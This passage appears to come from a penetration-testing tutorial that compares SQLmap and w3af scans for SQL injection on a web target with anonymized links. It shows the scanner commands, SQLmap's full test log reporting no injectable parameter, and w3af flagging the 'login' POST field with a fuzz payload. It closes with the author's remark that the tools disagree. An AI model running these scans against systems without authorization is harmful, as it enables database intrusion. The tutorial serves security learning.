- [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")
SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.
Scan finished in 12 seconds.
w3af>>>
As we can see, since the previous scans were not cleared they are kept in the output, so we mark the current one in bold.
[Link]
A) SQLmap
root@bt:/pentest/database/sqlmap# ./[Link] -u "[Link] -b
[Link] [INFO] using '/pentest/database/sqlmap/output/[Link]/session' as session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] testing if the url is stable, wait a few seconds
[Link] [INFO] url is stable
[Link] [INFO] testing if GET parameter 'id' is dynamic
[Link] [WARNING] GET parameter 'id' appears to be not dynamic
[Link] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[Link] [INFO] testing sql injection on GET parameter 'id'
[Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[Link] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[Link] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[Link] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[Link] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[Link] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[Link] [INFO] testing 'Oracle AND time-based blind'
[Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[Link] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[Link] [WARNING] GET parameter 'id' is not injectable
[Link] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
We find another one that is not injectable.
B) W3af
w3af>>> target
w3af/config:target>>> set target [Link]
w3af/config:target>>> back
w3af>>> start

Found 5 URLs and 7 different points of injection.
The list of URLs is:
- [Link]
- [Link]
- [Link]
- [Link]
- [Link]

The list of fuzzable requests is:
- [Link] | Method: GET
- [Link] | Method: GET
- [Link] | Method: GET
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")
SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.
Scan finished in 11 seconds.
w3af>>>
As we have seen in the last 2 scans, we have a conflict between the programs: SQLmap on its side finds no vulnerability, while w3af does. That is where the human factor comes in; although we have tested 6 by hand, we have found no vulnerability.